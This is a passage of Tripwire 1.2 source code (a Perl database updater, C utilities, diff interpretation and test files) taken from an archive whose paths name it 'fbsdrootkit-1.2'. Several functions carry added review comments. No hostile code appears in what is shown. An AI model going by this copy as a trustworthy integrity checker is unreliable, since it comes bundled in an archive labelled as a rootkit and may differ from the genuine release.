ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 ## */ $usage = "usage: $0 "; $#ARGV != 1 && die $usage; # only one argument allowed ($Database = $ARGV[0]) || die $usage; # get name of db file $Back = $Database . ".BAK"; die "Will not clobber existing $Back (saved backup version).\n" if -e $Back; # Now, we create the backup file. We do this in stages. The first # stage involves linking the current file to the backup. We then # create a temp file to hold the output. Finally, when we are all # done, we unlink the original name and move the temporary to the # old name. $Database =~ m#^(.+)/[^/]+$#; $Temp = ($1 ? $1 : "./") . 
"tw.db_TEMP"; umask(077); link ($Database, $Back) || die "Failed to link $Database to $Back: $!"; open (TMPFD, ">$Temp") || die "Failed to open temporary file $Temp: $!"; ($Configfile = $ARGV[1]) || die $usage; # First we read in the configuration file, and remember the name of # each entry. # $entry[$i++] = ... # open(CONFIG, $Configfile) || die "Failed to open config file $Configfile\n"; while () { s/^ *//; if (m/^#/) { next; } chop; ($entry, $flags) = split; eval "\$eentry = qq#$entry#"; # expands \ddd form $entry = $eentry; #print "Found entry $entry\n"; $entry[$numentries] = $entry; $entrynums{$entry} = $numentries++; } # foreach dbentry { # foreach configentry { # assign score based on how maximal match # } # make sure entry(maximal match) is the entry(dbaseentry) # if not, correct # } # open(DBASE, $ARGV[0]); while () { m/^@@dbaseversion\s+(\d+)/ && do { next if $1 == 4; unlink($Temp, $Back); die "$Database is version $1, and I only know how to update version 4!"; }; next if (/^(#|@@)/); next if (/^@@/); @line = split(' ', $_, 6); $line[0] =~ s/#/\\#/g; $junk = $line[0]; eval "\$file = qq#$junk#"; # expands \ddd form $entrynum = ($line)[1]; # find longest substring match $longest = 0; for ($i = 0; $i < $numentries; $i++) { if ($file =~ m/$entry[$i]/) { if (length($entry[$i] > $longest)) { $longest = length($entry[$i]); $lentrymatch = $entry[$i]; } } } #print "entry=$longest: $file\n"; $realentrynum = $entrynums{$lentrymatch}; #print "entry=$realentrynum ($line[1]): $file\n"; if ($realentrynum != $line[1]) { #print "^^^^ Wow, it was wrong!!\n"; $_ = join(' ', (@line[0], $realentrynum, @line[2..5])); } else { $_ = join(' ', (@line[0..5])); } #if ($st_ino) { #$_ = join(' ', (@line[0..3], $st_ino, @line[5])); #} else { #warn "$file: lstat() failed: $! 
skipping...\n"; #} } continue { print TMPFD $_; } close TMPFD; unlink($Database) || warn "Failed to unlink old database file $Database: $!"; rename($Temp, $Database) || die "Failed to rename temporary file $Temp to $Database: $!"; fbsdrootkit-1.2/tripwire-1.2/src/utils.c100600 764 764 43530 5614763364 15434 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: utils.c,v 1.23 1994/07/25 16:23:16 gkim Exp $"; #endif /* * utils.c * * miscellaneous utilities for Tripwire * * Gene Kim * Purdue University */ #include "../include/config.h" #include "../include/byteorder.h" #include #include #include #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #ifdef STDLIBH #include #include #endif #include #ifdef STRINGH #include #else #include # if (!defined(strchr) && !defined(index)) # define strchr(s, c) index(s, c) # endif # if (!defined(memcpy) && !defined(bcopy)) # define memcpy(to, from, n) bcopy(from, to, n) # endif #endif #include #include #include #include #include #ifndef MAXHOSTNAMELEN #define MAXHOSTNAMELEN 64 #endif #ifndef XENIX # include #else # include #endif /* XENIX */ #ifndef GETHOSTNAME # include #endif #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" #ifndef SEEK_SET # define SEEK_SET L_SET #endif #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif static void print_perm(); #ifndef S_IRGRP #define S_IRGRP (S_IREAD >> 3) #define S_IWGRP (S_IWRITE >> 3) #define S_IXGRP (S_IEXEC >> 3) #define S_IROTH (S_IREAD >> 6) #define S_IWOTH (S_IWRITE >> 6) #define S_IXOTH (S_IEXEC >> 6) #endif void warn_with_err(format, name) char *format, *name; { extern int errno; int real_errno = errno; char *string; if (!name) string = format; else { string = (char *) malloc((unsigned) (strlen(format)+strlen(name)+1)); if (!string) { fputs("Unexpected malloc() failure in 'warn_with_err'!\n", stderr); exit(-1); } sprintf(string, format, name); errno = real_errno; } 
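perror(string);
}

/*
 * die_with_err(char *format, char *name)
 *
 *	report the failure through warn_with_err(), then exit with status 1.
 */
void
die_with_err(format, name)
    char *format, *name;
{
    warn_with_err(format, name);
    exit(1);
}

/*
 * filename_hostname_expand(char **ps)
 *
 *	expand the first '@' in the specified string to the hostname.
 *	(only the first one: the search below is a single strchr().)
 *
 *	Ex:  "xxx_@_xxx"  --->  "xxx_mentor.cc.purdue.edu_xxx"
 *
 *	On expansion (*ps) is pointed at a freshly malloc()ed string; the
 *	old string is not freed here.  Without an '@' (*ps) is untouched.
 */

static char hostname[MAXHOSTNAMELEN];

void
filename_hostname_expand(ps)
    char **ps;
{
    char *s = *ps;
    char *pc;
    char *expanded;
    size_t prefixlen, hostlen, restlen;

    if (! *hostname) {

	/* we only need to do this once */
#ifndef GETHOSTNAME
	struct utsname sysinfo;

	if (uname(&sysinfo) < 0)
	    die_with_err("filename_hostname_expand: uname()", (char *) NULL);

	/* nodename may be wider than hostname[]: bounded copy, then terminate */
	(void) strncpy(hostname, sysinfo.nodename, sizeof(hostname) - 1);
	hostname[sizeof(hostname) - 1] = '\0';

#else 	/* GETHOSTNAME */

	/* get the hostname */
	if (gethostname(hostname, sizeof(hostname)) < 0)
	    die_with_err("filename_hostname_expand: gethostname()",
			 (char *) NULL);

	/* a truncated name is not guaranteed to come back terminated */
	hostname[sizeof(hostname) - 1] = '\0';

#endif 	/* GETHOSTNAME */
    }

    /* is there a '@' in the filename? */
    if ((pc = strchr(s, '@')) == NULL) {
	return;
    }

    /*
     * Size the result from the three pieces and build it directly on the
     * heap.  The input length is not limited by the caller, so assembling
     * it in a fixed-size stack buffer first could be overrun by a long
     * configuration entry.
     */
    prefixlen = (size_t) (pc - s);
    hostlen = strlen(hostname);
    restlen = strlen(pc + 1);

    if ((expanded = (char *) malloc(prefixlen + hostlen + restlen + 1)) == NULL)
	die_with_err("filename_hostname_expand: malloc()", (char *) NULL);

    (void) memcpy(expanded, s, prefixlen);
    (void) memcpy(expanded + prefixlen, hostname, hostlen);
    /* restlen + 1 carries the terminating NUL across */
    (void) memcpy(expanded + prefixlen + hostlen, pc + 1, restlen + 1);

    /* make our pointer point to the expanded string */
    *ps = expanded;

    return;
}

/*
 * slash_count(char *pathname)
 *
 *	count the number of slashes in a given pathname.  This is used
 *	to determine the priority of a given file entry when generating
 *	the list of files.
 */

int
slash_count (pathname)
    char *pathname;
{
    register int count = 0;
    register char *pc;

    for (pc = pathname; *pc; pc++ ) {
	if (*pc == '/')
	    count++;
    }
    return count;
}

/*
 * string_split_space(char *string, char *s, char *t)
 *
 *	given (string), place the first word into (s), and the rest of
 *	into (t).
 *
 *	returns zero on success, -1 on failure.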
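*/

int
string_split_space (string, s, t)
    char *string;
    char *s;
    char *t;
{
    char *sp;

    /*
     * (sp) = the first space.  s = string[0 .. sp-string-1]
     *			       t = sp[1 .. end]
     *
     * No buffer lengths are passed in, so nothing here can bound the
     * copies: the caller must make (s) and (t) each at least
     * strlen(string)+1 bytes.
     */

    if ((sp = strchr(string, ' ')) == NULL) {
SPDEBUG(10)
	fprintf(stderr, "string_split_space: string doesn't contain space!\n");
	return -1;
    }

    /* don't forget to null-terminate the string w/strncpy() */
    (void) strncpy(s, string, sp-string);
    s[sp-string] = '\0';

    (void) strcpy(t, sp+1);

    return 0;
}

/*
 * int
 * string_split_ch(char *string, char *s, char *t, char ch)
 *
 *	given (string), place the first word into (s), and the rest of
 *	into (t), using (ch) as the field separator.  (ala perl).
 *
 *	returns zero when (ch) was found.  When it was not, the whole of
 *	(string) goes into (s), (t) is made empty and -1 is returned.
 *
 *	As with string_split_space(), (s) and (t) must each hold at least
 *	strlen(string)+1 bytes; no bound is checked here.
 */

int
string_split_ch (string, s, t, ch)
    char *string;
    char *s;
    char *t;
    int ch;
{
    char *sp;

    /*
     * (sp) = the first separator.  s = string[0 .. sp-string-1]
     *				   t = sp[1 .. end]
     */

    if ((sp = strchr(string, ch)) == NULL) {
	(void) strcpy(s, string);
	t[0] = '\0';
	return -1;
    }

    /* don't forget to null-terminate the string w/strncpy() */
    (void) strncpy(s, string, sp-string);
    s[sp-string] = '\0';

    (void) strcpy(t, sp+1);

    return 0;
}

/*
 * chop (char *s)
 *
 *	chop off the last character in a string, ala Perl.
 *	an empty string is left alone.
 */

void
chop (s)
    char *s;
{
    size_t slen;

    slen = strlen(s);

    /* with nothing to chop, s[slen-1] would be a write in front of the buffer */
    if (slen == 0)
	return;

    s[slen-1] = '\0';
    return;
}

/*
 * filename_escape_expand(char *filename)
 *
 *	expand \xxx octal characters, metacharacters, and known
 *	C escape sequences.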
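*/

void
filename_escape_expand (filename)
    char *filename;
{
    int i = 0;
    static char filetmp[MAXPATHLEN+256];
    int octal;
    register char *pcin = filename, *pcout = filetmp;

    /*
     * The expansion is done in (filetmp) and copied back over (filename)
     * at the end.  Every escape expands to no more bytes than it occupies,
     * so the output is never longer than the input: rejecting an input
     * that does not fit in (filetmp) is enough to bound every write below.
     */
    if (strlen(filename) >= sizeof(filetmp)) {
	fprintf(stderr,
	    "filename_escape_expand: filename too long (%lu bytes)!\n",
	    (unsigned long) strlen(filename));
	exit(1);
    }

    /*
     * case I:	it's not escaped
     * case II:	it's a three digit octal number
     * case III:	it's a standard C escape sequence
     *			(\n, \r, \', \", \t, \b, \f)
     *			(from Johnson, Stephen C.,
     *			"Yacc: Yet Another Compiler-Compiler")
     * case IV: 	it's one of our metacharacters {@#!|&()= }
     */

    while (*pcin) {

	/* case I: it's not an escape */
	if (*pcin != '\\') {
	    *pcout++ = *pcin++;
	    continue;
	}

	/* step over the backslash */
	pcin++;

	/*
	 * a lone backslash at the very end: keep it as it is and stop, so
	 * the scan never steps over the terminator into whatever follows
	 * the string in memory.
	 */
	if (*pcin == '\0') {
	    *pcout++ = '\\';
	    break;
	}

	/* case II: it's a three digit octal number */
	/* (the cast keeps bytes above 0x7f from reaching isdigit() negative) */
	if (isdigit((unsigned char) *pcin)) {

	    /* read in the three characters */
	    for (octal = i = 0; i < 3 ; i++, pcin++) {
		octal *= 8;
		if (*pcin > '7' || *pcin < '0') {
		    fprintf(stderr, "filename_escape_expand: bogus octal character (%c) in file `%s'!\n", *pcin, filename);
		    exit(1);
		}
		octal += *pcin-'0';
	    }

	    /* warn of filenames with null's in them */
	    if (octal == 0) {
		fprintf(stderr, "tripwire: warning: null character in file `%s'!\n", filename);
		exit(1);
	    }

	    *pcout++ = octal & 0xff;
	    continue;
	}

	/* case III: it's a standard C escape sequence */
	/* case IV: it's one of our escape characters */
	switch(*pcin) {
	case 'n':	*pcout++ = '\n'; break;
	case 'r':	*pcout++ = '\r'; break;
	case 't':	*pcout++ = '\t'; break;
	case 'b':	*pcout++ = '\b'; break;
	case 'f':	*pcout++ = '\f'; break;
	case '\'':
	case '"':
	case '@':
	case '!':
	case '#':
	case '=':
	case ' ':
	case ')':
	case '(':
	case '&':
	case '|':
	case '\\':
	/* same as our default case... it's the character itself */
	default:	*pcout++ = *pcin; break;
	}

	/*
	 * consume the escape letter in every case.  Left unconsumed after
	 * \n, \r, \t, \b or \f it would be copied a second time as an
	 * ordinary character on the next pass.
	 */
	pcin++;
    }

    /* null terminate the string */
    *pcout++ = '\0';

    (void) memcpy(filename, filetmp, pcout - filetmp);

    return;
}

/*
 * char *
 * filename_escape(char *filename)
 *
 *	find any characters that must be escaped in the file name.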
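 *
 *	returns a pointer to a static buffer, which the next call
 *	overwrites.
*/

char *
filename_escape (filename)
    char *filename;
{
    static char filetmp[MAXPATHLEN+256];
    register char *pcin = filename, *pcout = filetmp;
    /* last position from which a four-byte escape and the NUL still fit */
    char *pcmax = filetmp + sizeof(filetmp) - 5;
    unsigned int uc;
    int escape;

    /* these only matter if they are the first character */
    if (*pcin == '!' || *pcin == '=' || *pcin == '#') {
	*pcout++ = '\\';
	*pcout++ = *pcin++;
    }

    /* these must be replaced everywhere in the filename */
    while (*pcin) {

	/*
	 * an escaped name can be up to four times as long as the name it
	 * came from, so the static buffer has to be guarded explicitly.
	 */
	if (pcout > pcmax) {
	    fprintf(stderr, "filename_escape: escaped filename is too long!\n");
	    exit(1);
	}

	/*
	 * classify the byte as an unsigned value: where plain char is
	 * signed, a byte above 0x7f would otherwise reach the ctype
	 * routines (and any lookup table) as a negative number.
	 */
	uc = (unsigned char) *pcin;

	if (isalnum(uc)) {
	    escape = 0;
	}
	else if (iscntrl(uc)) {
	    escape = 1;
	}
	else {
	    switch(*pcin) {
	    case '\\':
	    case '\'':
	    case '\"':
	    case '@':
	    case ' ':
	    case '(':
	    case ')':
	    case '&':
	    case '|':
	    case '#':
		escape = 1;
		break;
	    default:
		escape = 0;
		break;
	    }
	}

	if (escape) {
	    /* backslash plus three octal digits, computed for any byte value */
	    *pcout++ = '\\';
	    *pcout++ = (char) ('0' + ((uc >> 6) & 07));
	    *pcout++ = (char) ('0' + ((uc >> 3) & 07));
	    *pcout++ = (char) ('0' + (uc & 07));
	}
	else {
	    *pcout++ = *pcin;
	}
	pcin++;
    }

    /* null terminate the string */
    *pcout++ = '\0';
    return filetmp;
}

#define NEWBASE64
#ifdef NEWBASE64
static char base64vec[] =
  "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:.";
#else
static char base64vec[] =
  "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
#endif

/* pltob64 -- walk through a vector of int32s, convert them to
 *	network byte ordering, and then convert to base 64
 *
 *	this is the preferred interface to btob64.
 *
 *	(pl) is copied into a local array first, so the caller's vector
 *	is not modified.  (numlongs) must be in 1..NUMTMPLONGS-1.
 */

#define NUMTMPLONGS 1000
char *
pltob64(pl, pcout, numlongs)
    uint32 *pl;
    char *pcout;
    int numlongs;
{
    register int i;
    register uint32 *plto;
    uint32 larray[NUMTMPLONGS];

    assert(numlongs < NUMTMPLONGS);

    /*
     * assert() compiles away under NDEBUG, which would leave the copy
     * into larray[] unbounded, so the same limit is also enforced here.
     */
    if (numlongs <= 0 || numlongs >= NUMTMPLONGS) {
	fprintf(stderr, "pltob64: bad vector length %d!\n", numlongs);
	exit(1);
    }

    /* we use our own ntohl() routines, but we have to do it in-place */
    memcpy((char *) larray, (char *) pl, numlongs*sizeof(uint32));

    for (i = 0, plto = larray; i < numlongs; i++) {
	bs_htonl(*plto++);
    }

    return btob64((unsigned char *) larray, (char *) pcout, numlongs*sizeof(uint32)*8);
}

/* btob64 -- convert arbitrary bits to base 64 string
 *
 * Input: bit array (represented as u_char array)
 *	  number of bits in the array
 *	  ptr-to-str for return string val
 *
 * This is high magic.  Trust me.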
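--spaf */

/*
 * One output character is written per six input bits, plus one for the
 * leading partial group when (numbits) is not a multiple of six, plus the
 * terminating NUL.  (pcout) must be sized by the caller for that; it is
 * not checked here.  Returns (pcout).
 */
char *
btob64(pcbitvec, pcout, numbits)
    register unsigned char *pcbitvec;
    register char *pcout;
    int numbits;
{
    register unsigned int val;
    register int offset;
    unsigned char *pcorig = (unsigned char *) pcout;

    assert(sizeof(unsigned char) == 1);	/* everything breaks otherwise */
    assert(numbits > 0);

    val = *pcbitvec;

    offset = numbits % 6;	/* how many bits initially? */
    if (offset) {
	val >>= (8 - offset);
	*pcout++ = base64vec[val & 0x1f];
    }

    for ( numbits -= offset; numbits > 0; offset += 6, numbits -= 6) {
	val = *pcbitvec;
	if (offset > 2) {
	    /* the next group straddles a byte boundary: pull in one more byte */
	    offset -= 8;
	    val <<= 8;
	    val |= *++pcbitvec;
	}
	val >>= (2-offset);

	*pcout++ = base64vec[val & 0x3f];
    }

    *pcout = '\0';

    return (char *) pcorig;
}

#ifdef FOO
char *
ltob64(num, vec64)
    register uint32 num;
    char *vec64;
{
    register char *p1 = vec64;
    register int i;

    /* build lsb -> msb */
    for (i = 5; i >= 0; i--) {
	p1[i] = base64vec[num & 0x3f];
	num >>= 6;
    }

    vec64[6] = 0;
    return vec64;
}
#endif

/*
 * int32
 * b64tol(char *vec)
 *
 *	given a base-64 string, convert to a int32.
 *
 *	with NEWBASE64 a character outside the alphabet is fatal: the
 *	routine prints a message and exits with status 1.
 */

int32
b64tol(vec)
    char *vec;
{
    register char *pc;
    register int32 num = 0L;

    /* we use a different base-64 vector now to preserve zero's traditional
     * value.
     */

#ifdef NEWBASE64
    for (pc = vec; *pc; pc++) {
	num <<= 6;
	if (*pc >= '0' && *pc <= '9')
	    num += (*pc - '0');		/* '0'..'9' -> 0..9 */
	else if (*pc >= 'A' && *pc <= 'Z')
	    num += (*pc - 'A' + 10);	/* 'A'..'Z' -> 10..35 */
	else if (*pc >= 'a' && *pc <= 'z')
	    num += (*pc - 'a' + 36);	/* 'a'..'z' -> 36..61 */
	else if (*pc == ':')
	    num += 62;
	else if (*pc == '.')
	    num += 63;
	else {
	    fprintf(stderr, "b64tol: fatal error: unknown character '%c'.\n",
				*pc);
	    exit(1);
	}
    }
    return num;
#else
    for (pc = vec; *pc; pc++) {
	num <<= 6;
	num += *pc;
	if (*pc <= '9')
	    num -= '.';
	else if (*pc <= 'Z')
	    num -= '5';		/* '5' == 'A' - 12 */
	else
	    num -= ';';		/* ';' == 'a' - 38 */
    }
    return num;
#endif
}

/*
 * oldb64tol(char *vec)
 *
 *	decode a string written with the older "./0-9A-Za-z" alphabet.
 *	characters are not validated.
 */
int32
oldb64tol(vec)
    char *vec;
{
    register char *pc;
    register int32 num = 0L;

    for (pc = vec; *pc; pc++) {
	num <<= 6;
	num += *pc;
	if (*pc <= '9')
	    num -= '.';
	else if (*pc <= 'Z')
	    num -= '5';		/* '5' == 'A' - 12 */
	else
	    num -= ';';		/* ';' == 'a' - 38 */
    }
    return num;
}

/*
 * direntry_print(char *name, struct stat stabuf))
 *
 *	print out a pretty directory entry for the specified file
 *
 *	this routine was taken from crc_check.c, written by Jon Zeeff
 *	(zeeff@b-tech.ann-arbor.mi.us)
 *
 *	hacked for use in Tripwire by Gene Kim.
 */

void
direntry_print (name, statbuf, mode)
    char *name;
    struct stat statbuf;
    int mode;
{
    struct passwd *entry;
    static char owner[20];
    char a_time[50];
    char *timestr;

    /* owner[] is kept between calls and only refreshed when the uid changes */
    static int prev_uid = -9999;

    switch(mode) {
    case DIFF_ADDED:	printf("added:   "); break;
    case DIFF_CHANGED:	printf("changed: "); break;
    case DIFF_DELETED:	printf("deleted: "); break;
    }

    if (statbuf.st_uid != prev_uid) {
	entry = (struct passwd *)getpwuid((int) statbuf.st_uid);
	if (entry) {
	    /*
	     * the account name comes from the password database and is not
	     * limited to what owner[] holds: bounded copy, then terminate.
	     */
	    (void) strncpy(owner, entry->pw_name, sizeof(owner) - 1);
	    owner[sizeof(owner) - 1] = '\0';
	}
	else
	    (void) sprintf(owner, "%d", (int) statbuf.st_uid);
	prev_uid = statbuf.st_uid;
    }

    /*
    if (statbuf.st_gid != prev_gid) {
	group_entry = getgrgid((int) statbuf.st_gid);
	if (group_entry)
	    (void) strcpy(group, group_entry->gr_name);
	else
	    (void) sprintf(group, "%d", statbuf.st_gid);
	prev_gid = statbuf.st_gid;
    }
    */

    /*
     * ctime() can return NULL for a timestamp it cannot represent.  The
     * mtime is whatever the file carries, so fall back to a fixed string
     * of the usual layout instead of handing NULL to the copy.
     */
    timestr = ctime(&statbuf.st_mtime);
    if (timestr == NULL)
	timestr = "??? ??? ?? ??:??:?? ????\n";
    (void) strncpy(a_time, timestr, sizeof(a_time) - 1);
    a_time[sizeof(a_time) - 1] = '\0';
    a_time[24] = '\0';

    print_perm((uint32)statbuf.st_mode);

    /* st_size is an off_t, which need not be an int: convert it to match the format */
    (void) printf(" %-9.9s %7ld %s", owner, (long) statbuf.st_size, a_time + 4);
    printf(" %s\n", name);
}

/*
 * This routine was taken from crc_check.c, written by Jon Zeeff
 * (zeeff@b-tech.ann-arbor.mi.us)
 *
 * hacked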
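for use in Tripwire by Gene Kim.
 *
 * print_perm(uint32 perm)
 *
 *	print the ten-character "ls -l" style rendering of a st_mode value.
 */

static void
print_perm(perm)
    uint32 perm;
{
    char string[20];

    (void) strcpy(string, "----------");

    switch (perm & S_IFMT) {
    case S_IFDIR:
	string[0] = 'd';
	break;
    case S_IFBLK:
	string[0] = 'b';
	break;
    case S_IFCHR:
	string[0] = 'c';
	break;
    case S_IFIFO:
	string[0] = 'p';
	break;
#if !defined(SYSV) || (SYSV > 3)
    case S_IFLNK:
	string[0] = 'l';
	break;
#endif
    }

    /* owner triplet; position 3 also carries the set-uid bit */
    if (perm & S_IREAD)
	string[1] = 'r';
    if (perm & S_IWRITE)
	string[2] = 'w';
    if (perm & S_ISUID && perm & S_IEXEC)
	string[3] = 's';
    else if (perm & S_IEXEC)
	string[3] = 'x';
    else if (perm & S_ISUID)
	string[3] = 'S';

    /*
     * group triplet; position 6 carries the set-gid bit.  It has to be
     * tested with S_ISGID: testing S_ISUID here shows a set-uid file as
     * set-gid and never shows a file that really is set-gid.
     */
    if (perm & S_IRGRP)
	string[4] = 'r';
    if (perm & S_IWGRP)
	string[5] = 'w';
    if (perm & S_ISGID && perm & S_IXGRP)
	string[6] = 's';
    else if (perm & S_IXGRP)
	string[6] = 'x';
    else if (perm & S_ISGID)
	string[6] = 'l';

    /* other triplet; position 9 also carries the sticky bit */
    if (perm & S_IROTH)
	string[7] = 'r';
    if (perm & S_IWOTH)
	string[8] = 'w';
    if (perm & S_ISVTX && perm & S_IXOTH)
	string[9] = 't';
    else if (perm & S_IXOTH)
	string[9] = 'x';
    else if (perm & S_ISVTX)
	string[9] = 'T';

    (void) printf("%s", string);
}

/*
 * fd_tempfilename_generate()
 *
 *	create a temporary file from TEMPFILE_TEMPLATE, unlink it at once,
 *	and return the open read/write descriptor.  exits with status 1 if
 *	no file could be created.
 */

int
fd_tempfilename_generate()
{
    enum { TEMPFILE_TRIES = 8 };
    char tmp[MAXPATHLEN+256];
    int fd = -1;
    int tries;

    /*
     * mktemp() only chooses a name; the file comes into existence in the
     * open() that follows.  O_EXCL makes that open() fail when anything,
     * a symbolic link included, already sits at the chosen name, so the
     * descriptor handed back always refers to a file created right here
     * with mode 0600.  A taken name is retried with a fresh one a few
     * times before giving up.
     */
    for (tries = 0; fd < 0 && tries < TEMPFILE_TRIES; tries++) {
	(void) strcpy(tmp, TEMPFILE_TEMPLATE);

	if ((char *) mktemp(tmp) == NULL || tmp[0] == '\0') {
	    perror("tempfilename_generate: mktemp()");
	    exit(1);
	}

	fd = open(tmp, O_RDWR | O_CREAT | O_EXCL, 0600);
    }

    if (fd < 0) {
	perror("tempfilename_generate: open()");
	exit(1);
    }

    /* unlink right away to make sure no one can tamper with our file */
    unlink(tmp);

    return fd;
}

/*
 * read the entirety of input from file descriptor, copying into a file in /tmp.
 * we unlink the file to prevent anyone from accessing it.
 * we then return a file descriptor to that file.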
*/ #define BSIZE 4096 int fd_copy_to_tmp(fdin) int fdin; { int readin; int fdout; struct stat statbuf; char buf[BSIZE]; /* we don't need to copy from the fd if it's a regular file */ if (fstat(fdin, &statbuf) < 0) { die_with_err("fd_copy_to_tmp: fstat()", NULL); } if ((statbuf.st_mode & S_IFMT) == S_IFREG) return fdin; fdout = fd_tempfilename_generate(); while ((readin = read(fdin, buf, BSIZE)) != 0) { if (readin < 0) { char *pc = (char *) malloc(100); sprintf(pc, "%d", fdin); die_with_err("fd_copy_to_tmp: read(%d)", pc); exit(1); } if (write(fdout, buf, readin) != readin) { die_with_err("fd_copy_to_tmp: write()", NULL); } } close(fdin); if (lseek(fdout, 0, SEEK_SET) != 0) { die_with_err("fd_copy_to_tmp: lseek() rewind error!", NULL); } return fdout; } int file_copy_to_tmp(filename) char *filename; { int fdin, fdout; if ((fdin = open(filename, O_RDONLY)) < 0) { die_with_err("couldn't open %s", filename); } fdout = fd_copy_to_tmp(fdin); return fdout; } #ifdef TEST int debuglevel; main() { int i; char s[64][1024]; for (i = 0; i < 64; i++) { ltob64((int32) i, s[i]); printf("%d --> %s\n", i, s[i]); } for (i = 0; i < 64; i++) { int32 l; l = b64tol(s[i]); printf("%ld\n", l); } } #endif fbsdrootkit-1.2/tripwire-1.2/src/preen.interp.c.dist100600 764 764 6030 6273465264 17621 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.interp.c,v 1.14 1994/04/04 00:34:40 gkim Exp $"; #endif /* * preen.interp.c * * interpret the diffs between the database files * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #include #ifdef __STDC__ # include # include #endif #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" /* the diff lists */ struct list *diff_added_list = NULL, *diff_deleted_list = NULL, *diff_changed_list = NULL; /* how many in each list */ int diff_added_num = 0, diff_changed_num = 0, 
diff_deleted_num = 0, diff_unignored_num = 0; /* * preen_interp(FILE *fpin) * * do the actual interpreation of the diff output, generated by * diffing the two database files. */ void preen_interp (fpin) FILE *fpin; { char s[1024]; char key[MAXPATHLEN+256], value[512]; struct list_elem *plist; if (!quietmode) fprintf(stderr, "### Phase 4: Searching for inconsistencies\n"); /* start reading in lines from the new database */ while (fgets(s, sizeof(s), fpin) != NULL) { char *oldvalue; static int countlines = 1; countlines++; /* is it a comment? */ if (s[0] == '#') continue; if (s[0] == '@' && s[1] == '@') continue; /* * if it's in the list: * flag as SEEN * a) if it's the same, next; * b) if it's different, it's CHANGED; * otherwise, * it's ADDED * * scan entire list, find all !SEEN * they're DELETED */ /* (this should never happen since it was already preprocessed!) */ if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: fatal parse error in preprocessed database file, line %d\n!", progname, countlines); exit(1); } filename_escape_expand(key); /* if file is in saved database */ if ((oldvalue = list_lookup(key, &olddbase_list)) != NULL) { list_setflag(key, FLAG_SEEN, &olddbase_list); /* was it CHANGED? 
*/ if (strcmp(value, oldvalue) != 0) { SPDEBUG(6) printf("--(changed %s)------vvv\n", key); SPDEBUG(6) printf(">%s>%s\n", oldvalue, value); list_set(key, value, 0, &diff_changed_list); diff_changed_num++; } /* else skip it */ else continue; } /* else it's been ADDED */ else { list_set(key, value, 0, &diff_added_list); diff_added_num++; } } /* look for DELETED entries */ if (list_open(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } while ((plist = list_get(&olddbase_list)) != NULL) { /* skip entries that have already been seen */ if (plist->flag & FLAG_SEEN) continue; list_set(plist->varname, plist->varvalue, 0, &diff_deleted_list); diff_deleted_num++; } if (list_close(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } return; } fbsdrootkit-1.2/tripwire-1.2/tests/ 40700 764 764 0 5630552017 14344 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/tests/testfiles/ 40700 764 764 0 5630552017 16346 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/tests/Makefile100600 764 764 1503 5503713714 16104 0ustar dfdf# $Id: Makefile,v 1.14 1993/12/15 23:03:40 genek Exp $ # # Tripwire test DIST=tripwire-1.1 SIGGEN=../src/siggen TESTDIR=./testfiles TEMPFILE=@@TRIPWIRE_TEST.0 TEST0KEY=test0.key HOSTNAME= all: OKSIGS test OKSIGS: $(SIGGEN) createfiles $(SHELL) test0.sh $(SIGGEN) $(TESTDIR) $(TEMPFILE) $(TEST0KEY) @rm -rf $(TESTDIR)/t_file* createfiles: createfiles.c @$(CC) $(CFLAGS) -o createfiles createfiles.c $(LIBS) OKEXER: @$(SHELL) test.twpre.sh @$(SHELL) test.update.sh @$(SHELL) test.inter.sh @$(SHELL) test.escape.sh @rm -rf databases @touch OKEXER test: ../src/tripwire OKSIGS OKEXER @HOST=`echo $(HOSTNAME)`; \ CURRPATH=`pwd`; \ $(SHELL) test1.sh "$(HOSTNAME)" $(DIST) ../src/tripwire: (cd ..; make all) clean: rm -f tw.db_TEST.@ @tw.config createfiles $(TEMPFILE) OKSIGS $(TESTDIR)/t_file* OKEXER clobber: clean fbsdrootkit-1.2/tripwire-1.2/tests/createfiles.c100600 764 764 4201 5435554623 17102 0ustar dfdf#include 
#include #define TESTFILEDIR "./testfiles/" /* @@(string) indicates special test that doesn't use literal strings. We * interpret these down below. */ char *pc_strings[] = { "", "a", "abc", "message digest", "abcdefghijklmnopqrstuvwxyz", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", "12345678901234567890123456789012345678901234567890123456789012345678901234567890", "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", "1\n", "12\n", "123\n", "1234\n", "12345\n", "123456\n", "1234567\n", "123456789\n", "The theory of quantum electrodynamics has now lasted for\n\ more than fifty years, and has been tested more and more\n\ accurately over a wider and wider range of conditions.\n\ At the present time I can proudly say that there is no\n\ significant difference between experiment and theory!\n\ \n\ Just to give you an idea of how the theory has been put\n\ through the wringer, I'll give you some recent numbers:\n\ experiments have Dirac's number at 1.00115965221 (with\n\ an uncertainty of about five times as much). 
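To give you\n\ a feeling for the accuracy of these numbers, it comes\n\ out something like this: If you were to measure the\n\ distance from Los Angeles to New York to this accuracy,\n\ it would be exact to the thickness of a human hair.\n\ That's how delicately quantum electrodynamics has, in the\n\ past fifty years, been checked -- both theoretically and\n\ experimentally.\n", };

/*
 * main -- write one fixture file per entry of pc_strings[].
 *
 * Entry i is written to TESTFILEDIR "/t_file<i>".  When exactly one
 * argument is given, that directory is created first; the files are
 * still written under TESTFILEDIR, as in the original.
 * NOTE(review): the argument is otherwise unused -- confirm whether
 * the files were meant to go under it.
 *
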